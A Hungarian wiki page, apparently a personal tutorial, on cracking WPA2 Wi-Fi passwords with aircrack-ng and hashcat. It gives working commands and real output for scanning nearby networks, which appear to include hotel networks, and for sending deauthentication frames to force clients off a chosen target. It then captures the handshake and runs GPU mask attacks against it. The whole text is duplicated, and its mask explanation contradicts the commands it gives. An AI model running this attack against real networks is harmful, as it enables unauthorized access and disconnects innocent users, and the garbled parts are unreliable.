7,540
edits
Changes
Created page with "https://medium.com/@brannondorsey/crack-wpa-wpa2-wi-fi-routers-with-aircrack-ng-and-hashcat-a5a5d3ffea46 =Bevezető= A koncepció a következő. Elsőként begyűjtjük a fel..."
https://medium.com/@brannondorsey/crack-wpa-wpa2-wi-fi-routers-with-aircrack-ng-and-hashcat-a5a5d3ffea46
=Bevezető=
A koncepció a következő. Elsőként begyűjtjük a feltörni kívánt hálózat adatait. Szükségünk van a BSSID-ra és a csatorna számára, amit az AccessPoint használ. Ha már tudjuk ezeket az információkat, akkor elkezdünk addig hallgatózni a csatornánk, amíg nem érkezik egy Handshake üzenet valamelyik klienstől. Csak olyan hálózatot tudunk megtámadni, ahol vannak kliensek, akik már ismerik a jelszót. Ha van legalább 1 kliens az AP-ra csatlakozva, akkor azt a klienst egy hamis autentikációs üzenettel rá tudjuk venni hogy csatlakozzon újra, így el tudjuk kapni a handshake üzenetet, amiben benne van a jelszó hash lenyomata. Ezen komplex feladat elvégzésére a '''aircrack-ng''' szoftver csomagot fogjuk használni.
A hash visszafejtését egy GPU rig-en fogjuk végezni a hashcat programmal, ami remekül ki tudja használni a GPU rig nyújtotta párhuzamosíthatóságot. Az airmon-ng által kiköpött hash formátum nem fogyasztható a hashcat által, ezért a .cap formátumot konvertálni kell '''.hccapx''' formátumra, majd brute-force módszerrel megpróbáljuk visszafejteni a hash-t.
=Installáció=
==Aircrack-ng==
Installálni kell a '''aircrack-ng''' csomagot
<pre>
# dnf install aircrack-ng
</pre>
==hashcat-utils==
Az aircrack által használt '''.cap''' fájformátumot a '''hashcat-utils-master''' csomagban található konverterrel tudjuk majd '''.hccapx''' formátumra konvertálni, amiben a hash formátum már megfelelő a haschcat-nek.
....
==Hashcat==
A Hascat-et a GPU rigre kell telepíteni. Itt feltételezzük, hogy már rendelkezésünkre áll egy teljesen konfigurált GPU rig (mining rig).
...hashcat telepítése...
<pre>
# ./hashcat64.bin -m 1000 -b
hashcat (v4.1.0) starting in benchmark mode...
Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #3: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1060 3GB, 754/3019 MB allocatable, 9MCU
* Device #2: GeForce GTX 1060 3GB, 754/3019 MB allocatable, 9MCU
* Device #3: GeForce GTX 1050 Ti, 1010/4040 MB allocatable, 6MCU
Benchmark relevant options:
===========================
* --optimized-kernel-enable
Hashmode: 1000 - NTLM
Speed.Dev.#1.....: 14465.9 MH/s (83.46ms) @ Accel:128 Loops:1024 Thr:1024 Vec:1
Speed.Dev.#2.....: 13824.3 MH/s (85.87ms) @ Accel:128 Loops:1024 Thr:1024 Vec:1
Speed.Dev.#3.....: 8868.6 MH/s (87.05ms) @ Accel:256 Loops:512 Thr:1024 Vec:1
Speed.Dev.#*.....: 37158.8 MH/s
</pre>
Látható hogy a rig-ünk teljes kapacítása 37158.8 Mega hash / sec (ez nem túl sok). Fontos hogy a rig összes GPU-ja ki legyen itt listázva.
<br>
<br>
=Jelszó feltörése=
==Handshake elkapása==
A WiFi adatpert át kell állítani monditor üzemmódba. Erre nem minden wifi kártya képes, a DELL gyári kártyája, szerenécsre igen:
<pre>
# airmon-ng start wlp3s0
.... [phy0]wlp3s0mon)
</pre>
Az utolsó sorban láthatjuk hogy mi lett a monitor interfész neve, ezt kell használni innentől kezdve a támadás során: '''wlp3s0mon'''
Most nézzük meg hogy milyen hálózatokat lát a WiFi kártya. Szükésgünk lesz a feltörendő hálózat BSSID-jére és az AccessPoint által használt csatornára:
<pre>
# airodump-ng wlp3s0mon
CH 7 ][ Elapsed: 1 min ][ 2018-07-25 16:29
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AC:C1:EE:88:CE:93 -51 279 0 0 6 54e. WPA2 CCMP PSK RedmiAdam
00:12:C9:31:7A:28 -77 103 0 0 6 54e. WPA2 CCMP PSK STUDIO IRENE <<<<
C4:A3:66:45:34:6C -84 56 23 0 1 54e WPA2 CCMP PSK COSMOTE-45346C
70:3A:D8:08:9A:F4 -86 47 8 0 9 54e WPA2 CCMP PSK Almare_Roof
18:A6:F7:7E:B2:74 -86 43 0 0 1 54e WPA2 CCMP PSK STUDIO IRENE RECEPTION
68:72:51:62:B0:19 -91 1 0 0 10 54e. WPA2 CCMP PSK Hotel Hara 2
52:A3:66:50:72:C9 -1 0 1 0 1 -1 OPN <length: 0>
...
</pre>
Látható, hogy az általunk felörni kívánt hálózat a 6-os csatornán van, és a BSSID-je: '''00:12:C9:31:7A:28'''
Most addig fogunk hallgatózni ezen a csatornán, amíg nem érkezik legalább egy hanshsake az egyik klienstől. Ha egy kliens sincs éppen az AP-re csatlakozva, akkor nem járhatunk sikerrel.
A hallgatózó airodump-ng parancs szintaktikája az alábbi:
airodump-ng -c <csatorna száma> --bssid <bssid> -w <output fájl base neve> <interfész név>
* csatorna száma: 6
* bssid: 00:12:C9:31:7A:28
* montitor interszé neve: wlp3s0mon
<pre>
# airodump-ng -c 6 --bssid 00:12:C9:31:7A:28 -w psk3 wlp3s0mon
CH 6 ][ Elapsed: 12 s ][ 2018-07-25 16:41 <itt jelenik majd meg a handshake>
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:12:C9:31:7A:28 -80 100 147 3 0 6 54e. WPA2 CCMP PSK STUDIO IRENE
BSSID STATION PWR Rate Lost Frames Probe
00:12:C9:31:7A:28 8C:F5:A3:9A:A8:D0 -83 0 -24 0 1
00:12:C9:31:7A:28 8C:0D:76:D4:56:34 -1 0e- 0 0 2
00:12:C9:31:7A:28 AC:C1:EE:97:17:EF -89 0 - 6 0 2
</pre>
{{note|Ha itt nem látunk egy klienst sem a listában, akkor nem fog sikerülni a támadás, mert nem lesz ki újra csatlakozzon}}
Láthatjuk a klienseket az alsó listában (station). Jelenleg 3 kliens csatlakozik az AP-re. Vagy addig várunk, amíg valaki nem csatakozik újra, vagy kierőszakoljuk mi magunk az újracsatlakozást a kliensek becsapásával. A cél, hogy a jobb felős sarokban megjelenjen a '''WPA handshake''' felirat, amit be is jelöltem ('itt jelenik majd meg a handshake')
Most erőszakoljuk ki a kliensek újracsatlakozását egy hamis autentikációs üzenettel, amit a broadcust címre küldünk a '''aireplay-ng''' eszközzel, ami része az airodump-ng csomagnak.
{{worning|Az összes kliens meg fogja szakítani a kapcsolatot egy pillanatra az AP-val, így történthet adatvesztés}}
aireplay-ng -0 2 -a <bssid> <interfész név>
Itt a 2-val azt mondjuk meg, hogy kettő darab becsapós csomagot küldjön ki. Nyissunk meg egy másik command ablakot, és adjuk ki az alábbi parancsot:
<pre>
# aireplay-ng -0 2 -a 00:12:C9:31:7A:28 wlp3s0mon
16:52:50 Waiting for beacon frame (BSSID: 00:12:C9:31:7A:28) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
16:52:50 Sending DeAuth to broadcast -- BSSID: [00:12:C9:31:7A:28]
16:52:51 Sending DeAuth to broadcast -- BSSID: [00:12:C9:31:7A:28]
</pre>
Látható, hogy kettő darab becsapós csomagot küldütt ki az AP nevében a broadcust címre. Most várni kell hogy a kliensek úrja csatlakozzanak.
Ha legalább egy kliens megkapta a becsapós csomagot, újra fog csatlakozni. Ezt onnan fogjuk lánti, hogy a hálózat figyelő abalkunkban, jobb felül megjelenik a handshake. A Crtl+c-vel állítsuk le a montitort.
<pre>
CH 6 ][ Elapsed: 2 mins ][ 2018-07-25 16:58 ][ WPA handshake: 00:12:C9:31:7A:28 <<<itt megjelent a handshake
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:12:C9:31:7A:28 -79 100 1484 63 0 6 54e. WPA2 CCMP PSK STUDIO IRENE
BSSID STATION PWR Rate Lost Frames Probe
...
</pre>
{{note|Ha a becsapós csomagok kiküldése után pár másodperccel nem jelenik meg a handshake, akkor kicsit várjunk, hogy újabb kliensek is az AP-ra csatlakozzanak, és próbáljuk meg újra. Ez türelem játék}}
Nézzük meg milyen fájlok keletkeztek:
<pre>
# ll
total 4468
....
-rw-r--r-- 1 root root 170590 Jul 25 16:58 psk3-03.cap
-rw-r--r-- 1 root root 589 Jul 25 16:58 psk3-03.csv
-rw-r--r-- 1 root root 592 Jul 25 16:58 psk3-03.kismet.csv
-rw-r--r-- 1 root root 4034 Jul 25 16:58 psk3-03.kismet.netxml
</pre>
Számunkra a '''.cap''' kiterjesztésű fájl az érdekes, abban vannak elmentve a handshake-ek, amiket akkor kaptunk el, mikor a kliensek újra csatlakoztak az AP-hez. Itt egy vagy több hash található, amiket vissza fogunk fejteni a GPU riggel. (az utolsó számot futtatásonként egyel növeli az airodump-ng, nálunk ez a 3. futtatás eredménye)
==Konvertálás==
A '''.cap''' fájlt konvertálni kell '''.hccapx''' formátumra, hogy fel tudjuk dolgozni a '''hashcat''' programmal.
<pre>
cd ...../hashcat-utils-master/src/
# ./cap2hccapx.bin psk3-03.cap psk3-03.hccapx
Networks detected: 1
[*] BSSID=00:12:c9:31:7a:28 ESSID=STUDIO IRENE (Length: 12)
--> STA=ac:c1:ee:97:17:ef, Message Pair=0, Replay Counter=1
--> STA=ac:c1:ee:97:17:ef, Message Pair=2, Replay Counter=1
Written 2 WPA Handshakes to: psk3-03.hccapx
</pre>
Látható, hogy a '''psk3-03.cap''' fájl 2 handshake-et tartalmazott, tehát két klienst is rá tudtunk venni hogy újracsatlakozzon.
{{note|Ha az utolsó sorban az jelenik meg, hogy 'Written 0 WPA..', az azt jelenit, hogy nem tartalmazott handshake-t a .cap fájl, nem sikerült felvenni egy újracsatlakozást sem. Mindig várjuk meg, hogy a monitorozás alatt megjelenjen jobb fölül a 'WPA Handshake' felirat.
=Hash visszafejtése=
hogyan telepítsük + gui: https://www.shellntel.com/blog/2017/2/8/how-to-build-a-8-gpu-password-cracker<br>
==Másolás==
Első lépésként a konvertált hash fájlt (psk3-03.hccapx) a rig-re kell másolni.
<pre>
# scp psk3-03.hccapx root@example.org:/path/to/folder
</pre>
{{warning|Fontos, hogy minden más GPU tevékenységet leállítsunk a rig-en, tehát NE bányásszunk, amíg jelszó visszafejtésre akarjuk használni a gépet :) }}
==Brute-force==
maszkos támadás a hashcat oldalárol: https://hashcat.net/wiki/doku.php?id=mask_attack<br>
egy remek példa: https://www.4armed.com/blog/perform-mask-attack-hashcat/<br><br>
A hashcat jelelegi verziója (4) már nem támogatja az igazi brute-force törést, mára már a maszk alapú törést hívják brute-force-nak. Ez azt jelenti, hogy egyrészről valami féle feltételezéssel kell éljünk a jelszó hosszát illetően, másrészt minden egyes jelszó karakterre meg kell adni a karakter készletet, ami ott szóba jöeht.
./hashcat64.bin -m 2500 psk3-03.hccapx -a 3 ?1?1?1?1?1?1?1?1?1?1?1?1?1 --increment -1 ?l
./hashcat64.bin -m 2500 -a 3 -1 ?l -o cracked psk-01.hccapx ?1?1?1?1?1?1?1?1?1?1?1?1?1
* -m -el meg kell mondani a hash tipusát. Ez WPA esetén mindig 2500.
* -a -val a támadás fajtáját. 3= brute force (maskos brute force)
* - aztán ami utána jön, az a maszk. A ? után mindig a character készletre hivatkozunk. Itt pont egy 8 hosszú jelszót adtunk meg.
vannak a beépített karakter készletek:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff
és ezeket kombinálhatjuk össze, amiket elnevezhetünk 1-től 4-ig, ahogy azt láthatjuk a kommand végén, ott van az 1-es definíciója: -1 ?l?d?u vagyis kis és nagybetűk + számok. De ide
még többet is megadhattunk volna, pl ha a tudjuk, hogy csak az eslő nagybetű. Bármilyen infó a jelszóról drasztikusan csökkenti a törést.
===Szótár alapú törés===
=Bevezető=
A koncepció a következő. Elsőként begyűjtjük a feltörni kívánt hálózat adatait. Szükségünk van a BSSID-ra és a csatorna számára, amit az AccessPoint használ. Ha már tudjuk ezeket az információkat, akkor elkezdünk addig hallgatózni a csatornánk, amíg nem érkezik egy Handshake üzenet valamelyik klienstől. Csak olyan hálózatot tudunk megtámadni, ahol vannak kliensek, akik már ismerik a jelszót. Ha van legalább 1 kliens az AP-ra csatlakozva, akkor azt a klienst egy hamis autentikációs üzenettel rá tudjuk venni hogy csatlakozzon újra, így el tudjuk kapni a handshake üzenetet, amiben benne van a jelszó hash lenyomata. Ezen komplex feladat elvégzésére a '''aircrack-ng''' szoftver csomagot fogjuk használni.
A hash visszafejtését egy GPU rig-en fogjuk végezni a hashcat programmal, ami remekül ki tudja használni a GPU rig nyújtotta párhuzamosíthatóságot. Az airmon-ng által kiköpött hash formátum nem fogyasztható a hashcat által, ezért a .cap formátumot konvertálni kell '''.hccapx''' formátumra, majd brute-force módszerrel megpróbáljuk visszafejteni a hash-t.
=Installáció=
==Aircrack-ng==
Installálni kell a '''aircrack-ng''' csomagot
<pre>
# dnf install aircrack-ng
</pre>
==hashcat-utils==
Az aircrack által használt '''.cap''' fájformátumot a '''hashcat-utils-master''' csomagban található konverterrel tudjuk majd '''.hccapx''' formátumra konvertálni, amiben a hash formátum már megfelelő a haschcat-nek.
....
==Hashcat==
A Hascat-et a GPU rigre kell telepíteni. Itt feltételezzük, hogy már rendelkezésünkre áll egy teljesen konfigurált GPU rig (mining rig).
...hashcat telepítése...
<pre>
# ./hashcat64.bin -m 1000 -b
hashcat (v4.1.0) starting in benchmark mode...
Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #3: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1060 3GB, 754/3019 MB allocatable, 9MCU
* Device #2: GeForce GTX 1060 3GB, 754/3019 MB allocatable, 9MCU
* Device #3: GeForce GTX 1050 Ti, 1010/4040 MB allocatable, 6MCU
Benchmark relevant options:
===========================
* --optimized-kernel-enable
Hashmode: 1000 - NTLM
Speed.Dev.#1.....: 14465.9 MH/s (83.46ms) @ Accel:128 Loops:1024 Thr:1024 Vec:1
Speed.Dev.#2.....: 13824.3 MH/s (85.87ms) @ Accel:128 Loops:1024 Thr:1024 Vec:1
Speed.Dev.#3.....: 8868.6 MH/s (87.05ms) @ Accel:256 Loops:512 Thr:1024 Vec:1
Speed.Dev.#*.....: 37158.8 MH/s
</pre>
Látható hogy a rig-ünk teljes kapacítása 37158.8 Mega hash / sec (ez nem túl sok). Fontos hogy a rig összes GPU-ja ki legyen itt listázva.
<br>
<br>
=Jelszó feltörése=
==Handshake elkapása==
A WiFi adatpert át kell állítani monditor üzemmódba. Erre nem minden wifi kártya képes, a DELL gyári kártyája, szerenécsre igen:
<pre>
# airmon-ng start wlp3s0
.... [phy0]wlp3s0mon)
</pre>
Az utolsó sorban láthatjuk hogy mi lett a monitor interfész neve, ezt kell használni innentől kezdve a támadás során: '''wlp3s0mon'''
Most nézzük meg hogy milyen hálózatokat lát a WiFi kártya. Szükésgünk lesz a feltörendő hálózat BSSID-jére és az AccessPoint által használt csatornára:
<pre>
# airodump-ng wlp3s0mon
CH 7 ][ Elapsed: 1 min ][ 2018-07-25 16:29
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AC:C1:EE:88:CE:93 -51 279 0 0 6 54e. WPA2 CCMP PSK RedmiAdam
00:12:C9:31:7A:28 -77 103 0 0 6 54e. WPA2 CCMP PSK STUDIO IRENE <<<<
C4:A3:66:45:34:6C -84 56 23 0 1 54e WPA2 CCMP PSK COSMOTE-45346C
70:3A:D8:08:9A:F4 -86 47 8 0 9 54e WPA2 CCMP PSK Almare_Roof
18:A6:F7:7E:B2:74 -86 43 0 0 1 54e WPA2 CCMP PSK STUDIO IRENE RECEPTION
68:72:51:62:B0:19 -91 1 0 0 10 54e. WPA2 CCMP PSK Hotel Hara 2
52:A3:66:50:72:C9 -1 0 1 0 1 -1 OPN <length: 0>
...
</pre>
Látható, hogy az általunk felörni kívánt hálózat a 6-os csatornán van, és a BSSID-je: '''00:12:C9:31:7A:28'''
Most addig fogunk hallgatózni ezen a csatornán, amíg nem érkezik legalább egy hanshsake az egyik klienstől. Ha egy kliens sincs éppen az AP-re csatlakozva, akkor nem járhatunk sikerrel.
A hallgatózó airodump-ng parancs szintaktikája az alábbi:
airodump-ng -c <csatorna száma> --bssid <bssid> -w <output fájl base neve> <interfész név>
* csatorna száma: 6
* bssid: 00:12:C9:31:7A:28
* montitor interszé neve: wlp3s0mon
<pre>
# airodump-ng -c 6 --bssid 00:12:C9:31:7A:28 -w psk3 wlp3s0mon
CH 6 ][ Elapsed: 12 s ][ 2018-07-25 16:41 <itt jelenik majd meg a handshake>
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:12:C9:31:7A:28 -80 100 147 3 0 6 54e. WPA2 CCMP PSK STUDIO IRENE
BSSID STATION PWR Rate Lost Frames Probe
00:12:C9:31:7A:28 8C:F5:A3:9A:A8:D0 -83 0 -24 0 1
00:12:C9:31:7A:28 8C:0D:76:D4:56:34 -1 0e- 0 0 2
00:12:C9:31:7A:28 AC:C1:EE:97:17:EF -89 0 - 6 0 2
</pre>
{{note|Ha itt nem látunk egy klienst sem a listában, akkor nem fog sikerülni a támadás, mert nem lesz ki újra csatlakozzon}}
Láthatjuk a klienseket az alsó listában (station). Jelenleg 3 kliens csatlakozik az AP-re. Vagy addig várunk, amíg valaki nem csatakozik újra, vagy kierőszakoljuk mi magunk az újracsatlakozást a kliensek becsapásával. A cél, hogy a jobb felős sarokban megjelenjen a '''WPA handshake''' felirat, amit be is jelöltem ('itt jelenik majd meg a handshake')
Most erőszakoljuk ki a kliensek újracsatlakozását egy hamis autentikációs üzenettel, amit a broadcust címre küldünk a '''aireplay-ng''' eszközzel, ami része az airodump-ng csomagnak.
{{worning|Az összes kliens meg fogja szakítani a kapcsolatot egy pillanatra az AP-val, így történthet adatvesztés}}
aireplay-ng -0 2 -a <bssid> <interfész név>
Itt a 2-val azt mondjuk meg, hogy kettő darab becsapós csomagot küldjön ki. Nyissunk meg egy másik command ablakot, és adjuk ki az alábbi parancsot:
<pre>
# aireplay-ng -0 2 -a 00:12:C9:31:7A:28 wlp3s0mon
16:52:50 Waiting for beacon frame (BSSID: 00:12:C9:31:7A:28) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
16:52:50 Sending DeAuth to broadcast -- BSSID: [00:12:C9:31:7A:28]
16:52:51 Sending DeAuth to broadcast -- BSSID: [00:12:C9:31:7A:28]
</pre>
Látható, hogy kettő darab becsapós csomagot küldütt ki az AP nevében a broadcust címre. Most várni kell hogy a kliensek úrja csatlakozzanak.
Ha legalább egy kliens megkapta a becsapós csomagot, újra fog csatlakozni. Ezt onnan fogjuk lánti, hogy a hálózat figyelő abalkunkban, jobb felül megjelenik a handshake. A Crtl+c-vel állítsuk le a montitort.
<pre>
CH 6 ][ Elapsed: 2 mins ][ 2018-07-25 16:58 ][ WPA handshake: 00:12:C9:31:7A:28 <<<itt megjelent a handshake
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:12:C9:31:7A:28 -79 100 1484 63 0 6 54e. WPA2 CCMP PSK STUDIO IRENE
BSSID STATION PWR Rate Lost Frames Probe
...
</pre>
{{note|Ha a becsapós csomagok kiküldése után pár másodperccel nem jelenik meg a handshake, akkor kicsit várjunk, hogy újabb kliensek is az AP-ra csatlakozzanak, és próbáljuk meg újra. Ez türelem játék}}
Nézzük meg milyen fájlok keletkeztek:
<pre>
# ll
total 4468
....
-rw-r--r-- 1 root root 170590 Jul 25 16:58 psk3-03.cap
-rw-r--r-- 1 root root 589 Jul 25 16:58 psk3-03.csv
-rw-r--r-- 1 root root 592 Jul 25 16:58 psk3-03.kismet.csv
-rw-r--r-- 1 root root 4034 Jul 25 16:58 psk3-03.kismet.netxml
</pre>
Számunkra a '''.cap''' kiterjesztésű fájl az érdekes, abban vannak elmentve a handshake-ek, amiket akkor kaptunk el, mikor a kliensek újra csatlakoztak az AP-hez. Itt egy vagy több hash található, amiket vissza fogunk fejteni a GPU riggel. (az utolsó számot futtatásonként egyel növeli az airodump-ng, nálunk ez a 3. futtatás eredménye)
==Konvertálás==
A '''.cap''' fájlt konvertálni kell '''.hccapx''' formátumra, hogy fel tudjuk dolgozni a '''hashcat''' programmal.
<pre>
cd ...../hashcat-utils-master/src/
# ./cap2hccapx.bin psk3-03.cap psk3-03.hccapx
Networks detected: 1
[*] BSSID=00:12:c9:31:7a:28 ESSID=STUDIO IRENE (Length: 12)
--> STA=ac:c1:ee:97:17:ef, Message Pair=0, Replay Counter=1
--> STA=ac:c1:ee:97:17:ef, Message Pair=2, Replay Counter=1
Written 2 WPA Handshakes to: psk3-03.hccapx
</pre>
Látható, hogy a '''psk3-03.cap''' fájl 2 handshake-et tartalmazott, tehát két klienst is rá tudtunk venni hogy újracsatlakozzon.
{{note|Ha az utolsó sorban az jelenik meg, hogy 'Written 0 WPA..', az azt jelenit, hogy nem tartalmazott handshake-t a .cap fájl, nem sikerült felvenni egy újracsatlakozást sem. Mindig várjuk meg, hogy a monitorozás alatt megjelenjen jobb fölül a 'WPA Handshake' felirat.
=Hash visszafejtése=
hogyan telepítsük + gui: https://www.shellntel.com/blog/2017/2/8/how-to-build-a-8-gpu-password-cracker<br>
==Másolás==
Első lépésként a konvertált hash fájlt (psk3-03.hccapx) a rig-re kell másolni.
<pre>
# scp psk3-03.hccapx root@example.org:/path/to/folder
</pre>
{{warning|Fontos, hogy minden más GPU tevékenységet leállítsunk a rig-en, tehát NE bányásszunk, amíg jelszó visszafejtésre akarjuk használni a gépet :) }}
==Brute-force==
maszkos támadás a hashcat oldalárol: https://hashcat.net/wiki/doku.php?id=mask_attack<br>
egy remek példa: https://www.4armed.com/blog/perform-mask-attack-hashcat/<br><br>
A hashcat jelelegi verziója (4) már nem támogatja az igazi brute-force törést, mára már a maszk alapú törést hívják brute-force-nak. Ez azt jelenti, hogy egyrészről valami féle feltételezéssel kell éljünk a jelszó hosszát illetően, másrészt minden egyes jelszó karakterre meg kell adni a karakter készletet, ami ott szóba jöeht.
./hashcat64.bin -m 2500 psk3-03.hccapx -a 3 ?1?1?1?1?1?1?1?1?1?1?1?1?1 --increment -1 ?l
./hashcat64.bin -m 2500 -a 3 -1 ?l -o cracked psk-01.hccapx ?1?1?1?1?1?1?1?1?1?1?1?1?1
* -m -el meg kell mondani a hash tipusát. Ez WPA esetén mindig 2500.
* -a -val a támadás fajtáját. 3= brute force (maskos brute force)
* - aztán ami utána jön, az a maszk. A ? után mindig a character készletre hivatkozunk. Itt pont egy 8 hosszú jelszót adtunk meg.
vannak a beépített karakter készletek:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff
és ezeket kombinálhatjuk össze, amiket elnevezhetünk 1-től 4-ig, ahogy azt láthatjuk a kommand végén, ott van az 1-es definíciója: -1 ?l?d?u vagyis kis és nagybetűk + számok. De ide
még többet is megadhattunk volna, pl ha a tudjuk, hogy csak az eslő nagybetű. Bármilyen infó a jelszóról drasztikusan csökkenti a törést.
===Szótár alapú törés===